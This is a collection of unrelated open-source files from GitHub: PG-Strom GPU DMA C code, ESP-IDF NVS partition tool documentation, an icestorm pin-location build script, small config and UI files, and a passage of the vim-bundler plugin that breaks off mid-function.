iomap_info->chunks[i].length), (size_t)(iomap_info->chunks[i].length), iomap_info->chunks[i].is_used ? "used" : "free"); } } pfree(iomap_info); } #endif Datum pgstrom_iomap_buffer_info(PG_FUNCTION_ARGS) { FuncCallContext *fncxt; iomap_buffer_info *iomap_info; Datum values[4]; bool isnull[4]; int i; HeapTuple tuple; if (SRF_IS_FIRSTCALL()) { TupleDesc tupdesc; MemoryContext oldcxt; int max_nchunks; fncxt = SRF_FIRSTCALL_INIT(); oldcxt = MemoryContextSwitchTo(fncxt->multi_call_memory_ctx); tupdesc = CreateTemplateTupleDesc(4, false); TupleDescInitEntry(tupdesc, (AttrNumber) 1, "gpuid", INT4OID, -1, 0); TupleDescInitEntry(tupdesc, (AttrNumber) 2, "offset", INT8OID, -1, 0); TupleDescInitEntry(tupdesc, (AttrNumber) 3, "length", INT8OID, -1, 0); TupleDescInitEntry(tupdesc, (AttrNumber) 4, "state", TEXTOID, -1, 0); fncxt->tuple_desc = BlessTupleDesc(tupdesc); max_nchunks = iomap_buffer_size / IOMAPBUF_CHUNKSZ_MIN; iomap_info = palloc(offsetof(iomap_buffer_info, chunks[max_nchunks * numDevAttrs])); iomap_info->nitems = 0; if (iomap_buffer_segments) { for (i=0; i < numDevAttrs; i++) { IOMapBufferSegment *iomap_seg = GetIOMapBufferSegment(i); cl_int gpuid = devAttrs[i].DEV_ID; setup_iomap_buffer_info(iomap_seg, gpuid, iomap_info); } } fncxt->user_fctx = iomap_info; MemoryContextSwitchTo(oldcxt); } fncxt = SRF_PERCALL_SETUP(); iomap_info = fncxt->user_fctx; if (fncxt->call_cntr >= iomap_info->nitems) SRF_RETURN_DONE(fncxt); i = fncxt->call_cntr; memset(isnull, 0, sizeof(isnull)); values[0] = Int32GetDatum(iomap_info->chunks[i].gpuid); values[1] = Int64GetDatum(iomap_info->chunks[i].offset); values[2] = Int64GetDatum(iomap_info->chunks[i].length); values[3] = PointerGetDatum(cstring_to_text(iomap_info->chunks[i].is_used ? 
"used" : "free")); tuple = heap_form_tuple(fncxt->tuple_desc, values, isnull); SRF_RETURN_NEXT(fncxt, HeapTupleGetDatum(tuple)); } PG_FUNCTION_INFO_V1(pgstrom_iomap_buffer_info); /* * iomap_buffer_owner_main * * MEMO: Since CUDA 8.0, once a process call cuInit(), then its forked child * processes will fail on cuInit() after that. It means, postmaster process * cannot touch CUDA APIs thus never be a holder of CUDA resources. * So, this background worker performs a lazy resource holder of i/o mapped * buffer for SSD2GPU P2P DMA. */ static void iomap_buffer_owner_main(Datum __arg) { char *pos; int i, j; int ev; CUresult rc; /* no special handling is needed on SIGTERM/SIGQUIT; just die */ BackgroundWorkerUnblockSignals(); /* init CUDA runtime */ rc = cuInit(0); if (rc != CUDA_SUCCESS) elog(ERROR, "failed on cuInit: %s", errorText(rc)); /* allocate device memory and map to the host physical memory space */ pos = iomap_buffer_segments; for (i=0; i < numDevAttrs; i++) { IOMapBufferSegment *iomap_seg = GetIOMapBufferSegment(i); CUdevice cuda_device; CUcontext cuda_context; CUdeviceptr cuda_devptr; CUipcMemHandle cuda_mhandle; Size remain; int mclass; StromCmd__MapGpuMemory cmd; /* setup i/o mapped device memory for each GPU device */ rc = cuDeviceGet(&cuda_device, devAttrs[i].DEV_ID); if (rc != CUDA_SUCCESS) elog(ERROR, "failed on cuDeviceGet: %s", errorText(rc)); rc = cuCtxCreate(&cuda_context, CU_CTX_SCHED_AUTO, cuda_device); if (rc != CUDA_SUCCESS) elog(ERROR, "failed on cuCtxCreate: %s", errorText(rc)); rc = cuMemAlloc(&cuda_devptr, iomap_buffer_size); if (rc != CUDA_SUCCESS) elog(ERROR, "failed on cuMemAlloc: %s", errorText(rc)); rc = cuIpcGetMemHandle(&cuda_mhandle, cuda_devptr); if (rc != CUDA_SUCCESS) elog(ERROR, "failed on cuIpcGetMemHandle: %s", errorText(rc)); memset(&cmd, 0, sizeof(StromCmd__MapGpuMemory)); cmd.vaddress = cuda_devptr; cmd.length = iomap_buffer_size; if (nvme_strom_ioctl(STROM_IOCTL__MAP_GPU_MEMORY, &cmd) != 0) elog(ERROR, "STROM_IOCTL__MAP_GPU_MEMORY failed: %m"); if (iomap_buffer_size % cmd.gpu_page_sz != 0) elog(WARNING, "i/o mapped GPU memory size (%zu) is not aligned to GPU page size(%u)", iomap_buffer_size, cmd.gpu_page_sz); /* setup IOMapBufferSegment */ elog(LOG, "NVMe-Strom: GPU Device Memory (%p-%p; %zuMB) is mapped", (char *)cuda_devptr, (char *)cuda_devptr + iomap_buffer_size - 1, (size_t)(iomap_buffer_size >> 20)); memcpy(&iomap_seg->cuda_mhandle, &cuda_mhandle, sizeof(CUipcMemHandle)); iomap_seg->gpu_page_sz = cmd.gpu_page_sz; iomap_seg->gpu_npages = cmd.gpu_npages; SpinLockInit(&iomap_seg->lock); for (j=0; j <= IOMAPBUF_CHUNKSZ_MAX_BIT; j++) dlist_init(&iomap_seg->free_chunks[j]); j = 0; mclass = IOMAPBUF_CHUNKSZ_MAX_BIT; remain = iomap_buffer_size; while (remain >= IOMAPBUF_CHUNKSZ_MIN && mclass >= IOMAPBUF_CHUNKSZ_MIN_BIT) { IOMapBufferChunk *iomap_chunk = &iomap_seg->iomap_chunks[j]; Size chunk_sz = (1UL << mclass); if (remain < chunk_sz) mclass--; else { iomap_chunk->mclass = mclass; dlist_push_tail(&iomap_seg->free_chunks[mclass], &iomap_chunk->free_chain); remain -= chunk_sz; j += (chunk_sz >> IOMAPBUF_CHUNKSZ_MIN_BIT); } } pg_memory_barrier(); /* * iomap_seg->iomap_handle != 0 indicates the i/o mapped device * memory is now ready to use. So, we have to put the @handle * last. Order shall be guaranteed with memory barrier. 
*/ iomap_seg->iomap_handle = cmd.handle; pos += SizeOfIOMapBufferSegment; } /* * Loop forever */ for (;;) { ResetLatch(MyLatch); CHECK_FOR_INTERRUPTS(); /* * TODO: It may be a good idea to have a health check of i/o mapped * device memory. */ ev = WaitLatch(MyLatch, WL_LATCH_SET | WL_TIMEOUT | WL_POSTMASTER_DEATH, 60 * 1000); /* wake up per minutes */ /* Emergency bailout if postmaster has died. */ if (ev & WL_POSTMASTER_DEATH) exit(1); } } /* * pgstrom_startup_nvme_strom */ static void pgstrom_startup_nvme_strom(void) { Size required; bool found; struct stat stbuf; if (shmem_startup_next) (*shmem_startup_next)(); /* is nvme-strom driver installed? */ if (stat(nvme_strom_ioctl_pathname, &stbuf) != 0) ereport(ERROR, (errcode(ERRCODE_FEATURE_NOT_SUPPORTED), errmsg("failed on stat(2) for %s: %m", nvme_strom_ioctl_pathname), errhint("nvme-strom.ko may not be installed on the system"))); /* allocation of static shared memory */ required = SizeOfIOMapBufferSegment * numDevAttrs, iomap_buffer_segments = ShmemInitStruct("iomap_buffer_segments", required, &found); if (found) elog(FATAL, "Bug? \"iomap_buffer_segments\" is already initialized"); memset(iomap_buffer_segments, 0, required); } /* * pgstrom_init_nvme_strom */ void pgstrom_init_nvme_strom(void) { static int __iomap_buffer_size; Size shared_buffer_size = (Size)NBuffers * (Size)BLCKSZ; Size max_nchunks; Size required; BackgroundWorker worker; /* pg_strom.iomap_buffer_size */ DefineCustomIntVariable("pg_strom.iomap_buffer_size", "I/O mapped buffer size for SSD-to-GPU P2P DMA", NULL, &__iomap_buffer_size, 0, 0, INT_MAX, PGC_POSTMASTER, GUC_NOT_IN_SAMPLE | GUC_UNIT_KB, NULL, NULL, NULL); iomap_buffer_size = (Size)__iomap_buffer_size << 10; if (iomap_buffer_size % IOMAPBUF_CHUNKSZ_MIN != 0) elog(ERROR, "pg_strom.iomap_buffer_size is not aligned to 4KB"); /* pg_strom.nvme_strom_enabled */ DefineCustomBoolVariable("pg_strom.nvme_strom_enabled", "Turn on/off SSD-to-GPU P2P DMA", NULL, &nvme_strom_enabled, true, PGC_SUSET, GUC_NOT_IN_SAMPLE, NULL, NULL, NULL); /* pg_strom.debug_force_nvme_strom */ DefineCustomBoolVariable("pg_strom.debug_force_nvme_strom", "(DEBUG) force to use raw block scan mode", NULL, &debug_force_nvme_strom, false, PGC_SUSET, GUC_NOT_IN_SAMPLE, NULL, NULL, NULL); /* * MEMO: Threshold of table's physical size to use NVMe-Strom: * ((System RAM size) - * (shared_buffer size)) * 0.67 + (shared_buffer size) * * If table size is enough large to issue real i/o, NVMe-Strom will * make advantage by higher i/o performance. */ sysconf_pagesize = sysconf(_SC_PAGESIZE); if (sysconf_pagesize < 0) elog(ERROR, "failed on sysconf(_SC_PAGESIZE): %m"); sysconf_phys_pages = sysconf(_SC_PHYS_PAGES); if (sysconf_phys_pages < 0) elog(ERROR, "failed on sysconf(_SC_PHYS_PAGES): %m"); if (sysconf_pagesize * sysconf_phys_pages < shared_buffer_size) elog(ERROR, "Bug? shared_buffer is larger than system RAM"); nvme_strom_threshold = ((sysconf_pagesize * sysconf_phys_pages - shared_buffer_size) * 2 / 3 + shared_buffer_size) / BLCKSZ; /* * i/o mapped device memory shall be set up * only when pg_strom.iomap_device_memory_size > 0. 
*/ if (iomap_buffer_size > 0) { max_nchunks = iomap_buffer_size / IOMAPBUF_CHUNKSZ_MIN; required = offsetof(IOMapBufferSegment, iomap_chunks[max_nchunks]); RequestAddinShmemSpace(MAXALIGN(required) * numDevAttrs); shmem_startup_next = shmem_startup_hook; shmem_startup_hook = pgstrom_startup_nvme_strom; /* also needs CUDA resource owner */ memset(&worker, 0, sizeof(BackgroundWorker)); snprintf(worker.bgw_name, sizeof(worker.bgw_name), "NVMe-Strom I/O Mapped Buffer"); worker.bgw_flags = BGWORKER_SHMEM_ACCESS; worker.bgw_start_time = BgWorkerStart_PostmasterStart; worker.bgw_restart_time = BGW_NEVER_RESTART; worker.bgw_main = iomap_buffer_owner_main; RegisterBackgroundWorker(&worker); } }
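/*
 * [Editor's note: the following block is not part of the original source
 *  file above. It is a minimal, self-contained sketch of the
 *  nvme_strom_threshold arithmetic performed in pgstrom_init_nvme_strom():
 *
 *      threshold = ((system RAM) - (shared_buffers)) * 2/3 + (shared_buffers)
 *
 *  expressed in BLCKSZ units. The concrete figures used below (64GiB RAM,
 *  8GiB shared_buffers, 8KiB BLCKSZ) are assumptions chosen purely for
 *  illustration; they are not taken from the code above.]
 */
#include <stdio.h>

int main(void)
{
	const unsigned long long BLCKSZ         = 8192ULL;      /* default PostgreSQL block size */
	const unsigned long long ram_size       = 64ULL << 30;  /* assumed physical RAM: 64GiB */
	const unsigned long long shared_buffers = 8ULL << 30;   /* assumed shared_buffers: 8GiB */

	/* same arithmetic as pgstrom_init_nvme_strom() */
	unsigned long long threshold_blocks =
		((ram_size - shared_buffers) * 2 / 3 + shared_buffers) / BLCKSZ;

	/* relations with fewer blocks than this keep using buffered reads */
	printf("nvme_strom_threshold = %llu blocks (~%llu GiB)\n",
	       threshold_blocks, (threshold_blocks * BLCKSZ) >> 30);
	return 0;
}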
{ "pile_set_name": "Github" }
#include "ofMain.h" #include "ofApp.h" #include "ofAppGlutWindow.h" //======================================================================== int main( ){ ofAppGlutWindow window; ofSetupOpenGL(&window, 1024,768, OF_WINDOW); // <-------- setup the GL context // this kicks off the running of my app // can be OF_WINDOW or OF_FULLSCREEN // pass in width and height too: ofRunApp( new ofApp()); }
{ "pile_set_name": "Github" }
10 dir 525538 http://[email protected]/weichuncai/trunk/lang http://[email protected] 2012-02-10T17:33:09.140533Z 503287 lmyoaoa b8457f37-d9ea-0310-8a92-e5e31aec5664 weichuncai-en_US.mo file 2012-03-31T06:30:09.000000Z 09d41686f8760d9798c6151f5317fae5 2012-02-10T17:33:09.140533Z 503287 lmyoaoa has-props 4027 weichuncai-en_US.po file 2012-03-31T06:30:09.000000Z c8a041472b230e09ee5df591425226cf 2012-02-10T17:33:09.140533Z 503287 lmyoaoa 6746
{ "pile_set_name": "Github" }
NVS Partition Generator Utility
===============================

:link_to_translation:`en:[English]`

Introduction
------------

The NVS partition generator utility (:component_file:`nvs_flash/nvs_partition_generator/nvs_partition_gen.py`) creates a binary file based on the key-value pairs listed in a CSV file. The binary file is compatible with the NVS structure defined in :doc:`Non-Volatile Storage (NVS) </api-reference/storage/nvs_flash>`. The utility is suitable for generating binary blobs containing ODM/OEM data that can be flashed externally at the time of device manufacturing. It also allows manufacturers, while shipping the same firmware, to generate a different configuration for each device through custom parameters such as serial numbers.

Prerequisites
-------------

To use this utility in encryption mode, install the following package:

- cryptography package

All the required Python packages are listed in `requirements.txt` in the root directory; please install them beforehand.

CSV File Format
---------------

Each line of the .csv file should contain four parameters, separated by commas. The parameters are described in the table below:

.. list-table::
   :header-rows: 1
   :widths: 5 10 45 40

   * - No.
     - Parameter
     - Description
     - Notes
   * - 1
     - Key
     - Key of the data. The application can retrieve the data later by querying this key.
     -
   * - 2
     - Type
     - Supported values are ``file``, ``data``, and ``namespace``.
     -
   * - 3
     - Encoding
     - Supported values are ``u8``, ``i8``, ``u16``, ``u32``, ``i32``, ``string``, ``hex2bin``, ``base64``, and ``binary``. This determines the type the value is encoded to in the binary ``bin`` file. The difference between ``string`` and ``binary`` encoding is that ``string`` data ends with a NULL character, whereas ``binary`` data does not.
     - The ``file`` type currently supports only the ``hex2bin``, ``base64``, ``string``, and ``binary`` encodings.
   * - 4
     - Value
     - Data value
     - The ``encoding`` and ``value`` cells of a ``namespace`` field should be empty. They are fixed for ``namespace`` and cannot be set; any values in these cells are ignored.

.. note:: The first line of the CSV file should always be the column header, and it is not configurable.

Below is a dump of such a CSV file::

    key,type,encoding,value      <-- column header
    namespace_name,namespace,,   <-- first entry should be of type "namespace"
    key1,data,u8,1
    key2,file,string,/path/to/file

.. note::

    Make sure that:

    - there is no space before or after the comma ','; and
    - there is no trailing whitespace at the end of each CSV line.

NVS Entries and Namespaces
--------------------------

If a namespace entry appears in the CSV file, the subsequent entries are treated as part of that namespace until the next namespace entry is found. Once a new namespace entry is found, all the entries after it are treated as part of the new namespace. (A combined example is given at the end of this document.)

.. note:: The first entry in a CSV file should always be a ``namespace`` entry.

Multipage Blob Support
----------------------

By default, binary blobs are allowed to span over multiple pages; the format is described in the :ref:`structure_of_entry` section. If you want to use the legacy format instead, this feature can be disabled in the utility.

Encryption Support
------------------

The NVS partition generator utility can also generate an encrypted binary file using AES-XTS encryption. For more details, see :ref:`nvs_encryption`.

Decryption Support
------------------

If an NVS binary file is encrypted using AES-XTS, this utility can also decrypt it. For more details, see :ref:`nvs_encryption`.

Running the Utility
-------------------

**Usage**::

    python nvs_partition_gen.py [-h] {generate,generate-key,encrypt,decrypt} ...

**Optional arguments**:

.. list-table::
   :header-rows: 1
   :widths: 5 15 40

   * - No.
     - Parameter
     - Description
   * - 1
     - -h, --help
     - Show the help message and exit

**Commands**::

    Run nvs_partition_gen.py {command} -h for additional help

.. list-table::
   :header-rows: 1
   :widths: 5 15 40

   * - No.
     - Parameter
     - Description
   * - 1
     - generate
     - Generate an NVS partition
   * - 2
     - generate-key
     - Generate keys for encryption
   * - 3
     - encrypt
     - Encrypt an NVS partition
   * - 4
     - decrypt
     - Decrypt an NVS partition

Generate NVS Partition (Default Mode)
-------------------------------------

**Usage**::

    python nvs_partition_gen.py generate [-h] [--version {1,2}] [--outdir OUTDIR] input output size

**Positional arguments**:

.. list-table::
   :header-rows: 1
   :widths: 10 40

   * - Parameter
     - Description
   * - input
     - Path to the CSV file to parse
   * - output
     - Path to the output NVS binary file
   * - size
     - Size of the NVS partition, in bytes (must be a multiple of 4096)

**Optional arguments**:

.. list-table::
   :header-rows: 1
   :widths: 16 40

   * - Parameter
     - Description
   * - -h, --help
     - Show the help message and exit
   * - --version {1,2}
     - Set the multipage blob version. Version 1: multipage blob disabled; version 2: multipage blob enabled. Default: version 2.
   * - --outdir OUTDIR
     - Output directory to store the created files (default: current directory)

Run the following command to create an NVS partition; a sample CSV file is provided with the utility::

    python nvs_partition_gen.py generate sample_singlepage_blob.csv sample.bin 0x3000

Generate Encryption Keys Only
-----------------------------

**Usage**::

    python nvs_partition_gen.py generate-key [-h] [--keyfile KEYFILE] [--outdir OUTDIR]

**Optional arguments**:

.. list-table::
   :header-rows: 1
   :widths: 18 40

   * - Parameter
     - Description
   * - -h, --help
     - Show the help message and exit
   * - --keyfile KEYFILE
     - Output path of the encryption key file
   * - --outdir OUTDIR
     - Output directory to store the created files (default: current directory)

Run the following command to generate only the encryption keys::

    python nvs_partition_gen.py generate-key

Generate Encrypted NVS Partition
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

**Usage**::

    python nvs_partition_gen.py encrypt [-h] [--version {1,2}] [--keygen] [--keyfile KEYFILE] [--inputkey INPUTKEY] [--outdir OUTDIR] input output size

**Positional arguments**:

.. list-table::
   :header-rows: 1
   :widths: 10 40

   * - Parameter
     - Description
   * - input
     - Path to the CSV file to parse
   * - output
     - Path to the output NVS binary file
   * - size
     - Size of the NVS partition, in bytes (must be a multiple of 4096)

**Optional arguments**:

.. list-table::
   :header-rows: 1
   :widths: 20 40

   * - Parameter
     - Description
   * - -h, --help
     - Show the help message and exit
   * - --version {1,2}
     - Set the multipage blob version. Version 1: multipage blob disabled; version 2: multipage blob enabled. Default: version 2.
   * - --keygen
     - Generate encryption keys for the NVS partition
   * - --keyfile KEYFILE
     - Output path of the key file
   * - --inputkey INPUTKEY
     - File containing the encryption keys for the NVS partition
   * - --outdir OUTDIR
     - Output directory to store the created files (default: current directory)

Run the following commands to encrypt an NVS partition; a sample CSV file is provided with the utility.

- Encrypt by letting the NVS partition generator utility generate the encryption keys::

    python nvs_partition_gen.py encrypt sample_singlepage_blob.csv sample_encr.bin 0x3000 --keygen

.. note:: The created encryption key is of the format ``<outdir>/keys/keys-<timestamp>.bin``.

- Encrypt by letting the utility generate the encryption keys and store them in a file with a custom name::

    python nvs_partition_gen.py encrypt sample_singlepage_blob.csv sample_encr.bin 0x3000 --keygen --keyfile sample_keys.bin

.. note:: The created encryption key is of the format ``<outdir>/keys/keys-<timestamp>.bin``.

.. note:: The encryption key is stored in a newly created file under the ``keys/`` directory, compatible with the NVS key-partition structure. For more details, see :ref:`nvs_key_partition`.

- Encrypt by providing the encryption keys as a binary input file::

    python nvs_partition_gen.py encrypt sample_singlepage_blob.csv sample_encr.bin 0x3000 --inputkey sample_keys.bin

Decrypt NVS Partition
~~~~~~~~~~~~~~~~~~~~~

**Usage**::

    python nvs_partition_gen.py decrypt [-h] [--outdir OUTDIR] input key output

**Positional arguments**:

.. list-table::
   :header-rows: 1
   :widths: 10 40

   * - Parameter
     - Description
   * - input
     - Path to the encrypted NVS partition file to parse
   * - key
     - Path to the file containing the decryption keys
   * - output
     - Output path of the decrypted binary file

**Optional arguments**:

.. list-table::
   :header-rows: 1
   :widths: 16 40

   * - Parameter
     - Description
   * - -h, --help
     - Show the help message and exit
   * - --outdir OUTDIR
     - Output directory to store the created files (default: current directory)

Run the following command to decrypt an encrypted NVS partition::

    python nvs_partition_gen.py decrypt sample_encr.bin sample_keys.bin sample_decr.bin

You can customize the format version number:

- Version 1: multipage blob disabled
- Version 2: multipage blob enabled

Version 1: Multipage Blob Disabled
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

To disable the multipage blob, run the partition generator utility in this format with the version parameter set to 1, as shown below; a sample CSV file is provided with the utility::

    python nvs_partition_gen.py generate sample_singlepage_blob.csv sample.bin 0x3000 --version 1

Version 2: Multipage Blob Enabled
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

To enable the multipage blob, run the partition generator utility in this format with the version parameter set to 2, as shown below; a sample CSV file is provided with the utility::

    python nvs_partition_gen.py generate sample_multipage_blob.csv sample.bin 0x4000 --version 2

.. note:: The minimum size of an NVS partition is 0x3000 bytes.

.. note:: When flashing the binary onto the device, make sure it is consistent with the application's sdkconfig settings.

Caveats
-------

- The partition generator utility does not check for duplicate keys and will write data for both of them. Make sure not to use keys with the same name.
- Once a new page is created, no data is written into the blank space of the previous page. Fields in the CSV file must be ordered so as to optimize memory usage.
- 64-bit data types are not yet supported.
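Example: Multiple Namespaces
----------------------------

For illustration, here is a hypothetical CSV file that combines the rules described above: two namespaces, plain data entries, and ``file`` entries. The key names, values, and file paths are made up for this example and are not part of the utility or its sample files::

    key,type,encoding,value
    device_info,namespace,,
    serial_no,data,string,SN-000123
    baud_rate,data,u32,115200
    certificates,namespace,,
    server_cert,file,string,/path/to/server_cert.pem
    device_key,file,hex2bin,/path/to/device_key.hex

A partition could then be generated from it with the ``generate`` command described above, e.g. ``python nvs_partition_gen.py generate my_values.csv my_nvs.bin 0x3000`` (the file names are again chosen only for illustration).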
{ "pile_set_name": "Github" }
#!/bin/bash mkdir -p pinloc-4k-cm81 cd pinloc-4k-cm81 pins=" A1 A2 A3 A4 A6 A7 A8 A9 B1 B2 B3 B4 B5 B6 B7 B8 B9 C1 C2 C3 C4 C5 C9 D1 D2 D3 D5 D6 D7 D8 D9 E1 E2 E3 E4 E5 E7 E8 F1 F3 F7 F8 G1 G2 G3 G4 G5 G6 G7 G8 G9 H1 H2 H4 H5 H7 H9 J1 J2 J3 J4 J8 J9 " if [ $(echo $pins | wc -w) -ne 63 ]; then echo "Incorrect number of pins:" $(echo $pins | wc -w) exit 1 fi { echo -n "all:" for pin in $pins; do id="pinloc-4k-cm81_${pin}" echo -n " ${id}.exp" done echo for pin in $pins; do id="pinloc-4k-cm81_${pin}" echo "module top(output y); assign y = 0; endmodule" > ${id}.v echo "set_io y ${pin}" >> ${id}.pcf echo; echo "${id}.exp:" echo " ICEDEV=lp4k-cm81 bash ../../icecube.sh ${id} > ${id}.log 2>&1" echo " ../../../icebox/icebox_explain.py ${id}.asc > ${id}.exp.new" echo " ! grep '^Warning: pin' ${id}.log" echo " rm -rf ${id}.tmp" echo " mv ${id}.exp.new ${id}.exp" done } > pinloc-4k-cm81.mk set -ex make -f pinloc-4k-cm81.mk -j4 python3 ../pinlocdb.py pinloc-4k-cm81_*.exp > ../pinloc-4k-cm81.txt
{ "pile_set_name": "Github" }
{ "parent": "item/generated", "textures": { "layer0": "gregtech:items/material_sets/fine/crushed_centrifuged" } }
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?> <menu xmlns:android="http://schemas.android.com/apk/res/android" xmlns:app="http://schemas.android.com/apk/res-auto" xmlns:tools="http://schemas.android.com/tools"> <item android:id="@+id/update_opponents_list" android:icon="@drawable/ic_refresh" android:title="@string/action_update_opponens_list" app:showAsAction="always" tools:ignore="AlwaysShowAction" /> <item android:id="@+id/settings" android:title="@string/action_settings" app:showAsAction="never" /> <item android:id="@+id/log_out" android:title="@string/action_logout" app:showAsAction="never" /> <item android:id="@+id/appinfo" android:title="@string/action_dialogs_app_info" app:showAsAction="never" /> </menu>
{ "pile_set_name": "Github" }
/* Copyright (C) 2014 The gtkmm Development Team * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library. If not, see <http://www.gnu.org/licenses/>. */ #include <gtk/gtk.h>
{ "pile_set_name": "Github" }
" bundler.vim - Support for Ruby's Bundler " Maintainer: Tim Pope <http://tpo.pe/> " Version: 2.1 if exists('g:loaded_bundler') || &cp || v:version < 700 finish endif let g:loaded_bundler = 1 if !exists('g:dispatch_compilers') let g:dispatch_compilers = {} endif let g:dispatch_compilers['bundle exec'] = '' " Section: Utility function! s:function(name) abort return function(substitute(a:name,'^s:',matchstr(expand('<sfile>'), '<SNR>\d\+_'),'')) endfunction function! s:sub(str,pat,rep) abort return substitute(a:str,'\v\C'.a:pat,a:rep,'') endfunction function! s:gsub(str,pat,rep) abort return substitute(a:str,'\v\C'.a:pat,a:rep,'g') endfunction function! s:shellesc(arg) abort if a:arg =~# '^[A-Za-z0-9_/.-]\+$' return a:arg else return shellescape(a:arg) endif endfunction function! s:fnameescape(file) abort if exists('*fnameescape') return fnameescape(a:file) else return escape(a:file," \t\n*?[{`$\\%#'\"|!<") endif endfunction function! s:shellslash(path) abort if exists('+shellslash') && !&shellslash return s:gsub(a:path,'\\','/') else return a:path endif endfunction function! s:fcall(fn, path, ...) abort let ns = matchstr(a:path, '^\a\a\+\ze:') if len(ns) && exists('*' . ns . '#' . a:fn) return call(ns . '#' . a:fn, [a:path] + a:000) else return call(a:fn, [a:path] + a:000) endif endfunction function! s:filereadable(path) abort return s:fcall('filereadable', a:path) endfunction function! s:completion_filter(results,A) abort let results = sort(copy(a:results)) call filter(results,'v:val !~# "\\~$"') let filtered = filter(copy(results),'v:val[0:strlen(a:A)-1] ==# a:A') if !empty(filtered) | return filtered | endif let regex = s:gsub(a:A,'[^/:]','[&].*') let filtered = filter(copy(results),'v:val =~# "^".regex') if !empty(filtered) | return filtered | endif let filtered = filter(copy(results),'"/".v:val =~# "[/:]".regex') if !empty(filtered) | return filtered | endif let regex = s:gsub(a:A,'.','[&].*') let filtered = filter(copy(results),'"/".v:val =~# regex') return filtered endfunction function! s:throw(string) abort let v:errmsg = 'bundler: '.a:string throw v:errmsg endfunction function! s:warn(str) abort echohl WarningMsg echomsg a:str echohl None let v:warningmsg = a:str endfunction function! s:add_methods(namespace, method_names) abort for name in a:method_names let s:{a:namespace}_prototype[name] = s:function('s:'.a:namespace.'_'.name) endfor endfunction let s:commands = [] function! s:command(definition) abort let s:commands += [a:definition] endfunction function! s:define_commands() abort for command in s:commands exe 'command! -buffer '.command endfor endfunction augroup bundler_utility autocmd! autocmd User Bundler call s:define_commands() augroup END let s:abstract_prototype = {} " Section: Syntax highlighting function! s:syntaxfile() abort syntax keyword rubyGemfileMethod gemspec gem source path git group platform platforms env ruby hi def link rubyGemfileMethod rubyInclude endfunction function! s:syntaxlock() abort setlocal iskeyword+=-,. 
syn match gemfilelockHeading '^[[:upper:] ]\+$' syn match gemfilelockKey '^\s\+\zs\S\+:'he=e-1 skipwhite nextgroup=gemfilelockRevision syn match gemfilelockKey 'remote:'he=e-1 skipwhite nextgroup=gemfilelockRemote syn match gemfilelockRemote '\S\+' contained syn match gemfilelockRevision '[[:alnum:]._-]\+$' contained syn match gemfilelockGem '^\s\+\zs[[:alnum:]._-]\+\%([ !]\|$\)\@=' contains=gemfilelockFound,gemfilelockMissing skipwhite nextgroup=gemfilelockVersions,gemfilelockBang syn match gemfilelockVersions '([^()]*)' contained contains=gemfilelockVersion syn match gemfilelockVersion '[^,()]*' contained syn match gemfilelockBang '!' contained if !empty(bundler#project()) exe 'syn match gemfilelockFound "\<\%(bundler\|' . join(keys(s:project().paths()), '\|') . '\)\>" contained' exe 'syn match gemfilelockMissing "\<\%(' . join(filter(keys(s:project().versions()), '!has_key(s:project().paths(), v:val)'), '\|') . '\)\>" contained' else exe 'syn match gemfilelockFound "\<\%(\S*\)\>" contained' endif syn match gemfilelockHeading '^PLATFORMS$' nextgroup=gemfilelockPlatform skipnl skipwhite syn match gemfilelockPlatform '^ \zs[[:alnum:]._-]\+$' contained nextgroup=gemfilelockPlatform skipnl skipwhite hi def link gemfilelockHeading PreProc hi def link gemfilelockPlatform Typedef hi def link gemfilelockKey Identifier hi def link gemfilelockRemote String hi def link gemfilelockRevision Number hi def link gemfilelockFound Statement hi def link gemfilelockMissing Error hi def link gemfilelockVersion Type hi def link gemfilelockBang Special endfunction function! s:setuplock() abort setlocal includeexpr=get(bundler#project().gems(),v:fname,v:fname) setlocal suffixesadd=/ cnoremap <buffer><expr> <Plug><cfile> get(bundler#project().gems(),expand("<cfile>"),"\022\006") let pattern = '^$\|Rails' if mapcheck('gf', 'n') =~# pattern nnoremap <silent><buffer> gf :Bopen <C-R><C-F><CR> endif if mapcheck('<C-W>f', 'n') =~# pattern nnoremap <silent><buffer> <C-W>f :Bsplit <C-R><C-F><CR> endif if mapcheck('<C-W><C-F>', 'n') =~# pattern nnoremap <silent><buffer> <C-W><C-F> :Bsplit <C-R><C-F><CR> endif if mapcheck('<C-W>gf', 'n') =~# pattern nnoremap <silent><buffer> <C-W>gf :Btabedit <C-R><C-F><CR> endif endfunction augroup bundler_syntax autocmd! autocmd BufNewFile,BufRead */.bundle/config set filetype=yaml autocmd BufNewFile,BufRead Gemfile,gems.rb \ if &filetype !=# 'ruby' | setf ruby | endif autocmd Syntax ruby \ if expand('<afile>:t') ==? 'gemfile' | call s:syntaxfile() | endif autocmd BufNewFile,BufRead [Gg]emfile.lock,gems.locked setf gemfilelock autocmd FileType gemfilelock set suffixesadd=.rb autocmd Syntax gemfilelock call s:syntaxlock() autocmd FileType gemfilelock call s:setuplock() autocmd User Rails/Gemfile.lock,Rails/gems.locked call s:setuplock() augroup END " Section: Initialization function! s:FindBundlerLock(path) abort let path = s:shellslash(a:path) let fn = fnamemodify(path,':s?[\/]$??') let ofn = "" let nfn = fn while fn !=# ofn && fn !=# '.' if s:filereadable(fn . '/Gemfile.lock') && s:filereadable(fn . '/Gemfile') return s:sub(fnamemodify(fn,':p'), '[\\/]=$', '/Gemfile.lock') elseif s:filereadable(fn . '/gems.locked') && s:filereadable(fn . '/gems.rb') return s:sub(fnamemodify(fn,':p'), '[\\/]=$', '/gems.locked') endif let ofn = fn let fn = fnamemodify(ofn,':h') endwhile return '' endfunction function! s:Detect(path) abort if !exists('b:bundler_lock') let lock = s:FindBundlerLock(a:path) if !empty(lock) let b:bundler_lock = lock unlet! 
